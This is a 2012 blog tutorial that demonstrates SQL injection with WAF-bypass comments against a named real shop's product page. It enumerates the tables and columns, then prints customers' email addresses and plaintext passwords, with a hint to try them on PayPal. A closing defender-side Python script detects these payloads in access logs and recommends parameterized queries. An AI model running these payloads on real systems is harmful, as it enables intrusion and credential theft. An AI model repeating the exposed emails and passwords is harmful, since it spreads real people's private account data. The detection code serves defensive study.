Friday, June 22, 2012

[Tut] Bypass 406 SQL for Newbie

Euro 2012 kicks off today, so I am taking the liberty of writing a tutorial on the 406 type of SQL injection for newbies. If you already know this, please go easy on me.

Site:


Code:
http://www.jansancleaningsupplies.com/index.php?pid=47'
+ Order by:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 1
--> No error.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=47 order by 2
--> Error.
+
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION SELECT 1-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Performing the bypass:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1-- -
-> 1
+Get table:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ 1 group_concat(table_name) from information_schema.tables where table_name=database()-- -
-->
Not Acceptable

An appropriate representation of the requested resource /index.php could not be found on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
+ Continuing the bypass:
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!table_name*/))) from information_schema./*!tables*/ where table_schema=database()-- -
-->
articles,auth,categories,customers,manufacturers,orders,products,specialfiles
+ Get columns: customers
Code:
www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!column_name*/))) from information_schema./*!columns*/ where table_schema=database() and /*!table_name*/=0x637573746f6d657273-- -
-->
id,email,password,passhash,joindate,firstname,mi,lastname,companyname,street1,
street2,city,state,zipcode,priphone,secphone,getemail,billme,shipping,orders

+Get id,email,password:
Code:
http://www.jansancleaningsupplies.com/index.php?pid=-47 UNION /*!SELECT*/ unhex(hex(group_concat(/*!id,0x7c,email,0x7c,password*/))) from customers-- -
-->
4|dpdurrell@hotmail.com|preston59

3|josh@uppertech.net|eeq7322
----> Check PP .
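
The 406 responses above stop once the keyword is written as `/*!SELECT*/`, because MySQL still executes the body of a versioned comment while a filter matching the literal text does not see it. The following is an added defender-side example, not part of the original post: it unwraps versioned comments before signature matching and runs over constructed access-log lines. The function names, the two signatures and the log format are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# MySQL executes the body of /*! ... */ (optionally /*!50000 ... */), so a
# filter has to unwrap it instead of treating it as an inert comment.
VERSIONED = re.compile(r"/\*!\d{0,5}(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)
SIGNATURES = {
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b"),
    "schema_enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b"),
}
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample access-log lines (documentation-range client address).
SAMPLE_LOG = [
    '203.0.113.7 - - [22/Jun/2012:20:01:10 +0000] "GET /index.php?pid=47 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [22/Jun/2012:20:01:31 +0000] "GET /index.php?pid=-47%20UNION%20SELECT%201--%20- HTTP/1.1" 406 310',
    '203.0.113.7 - - [22/Jun/2012:20:01:52 +0000] "GET /index.php?pid=-47%20UNION%20/*!SELECT*/%201--%20- HTTP/1.1" 200 5090',
    '203.0.113.7 - - [22/Jun/2012:20:02:15 +0000] "GET /index.php?pid=-47+UNION+/*!SELECT*/+1+from+information_schema./*!tables*/--+- HTTP/1.1" 200 5230',
]

def normalize(query):
    """Decode the query string and reduce it to what MySQL would parse."""
    s = unquote_plus(query)
    s = VERSIONED.sub(r" \1 ", s)   # keep the code inside versioned comments
    s = PLAIN_COMMENT.sub(" ", s)   # ordinary comments behave like whitespace
    return re.sub(r"\s+", " ", s).lower().strip()

def match(text):
    """Names of the signatures that fire on the given text."""
    return [name for name, rx in SIGNATURES.items() if rx.search(text)]

def scan(lines):
    """Return one finding per request whose normalized query hits a signature."""
    findings = []
    for number, line in enumerate(lines, 1):
        m = REQUEST.search(line)
        if not m:
            continue
        query = urlsplit(m.group(1)).query
        hits = match(normalize(query))
        if hits:
            # Same signatures on the merely URL-decoded text, for comparison.
            naive = match(unquote_plus(query).lower())
            findings.append({"line": number, "status": int(m.group(2)),
                             "hits": hits, "missed_by_naive": not naive})
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Signature matching only detects the probing. The flaw itself is the `pid` value reaching the SQL statement unparameterized, which a prepared statement or an integer cast removes.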
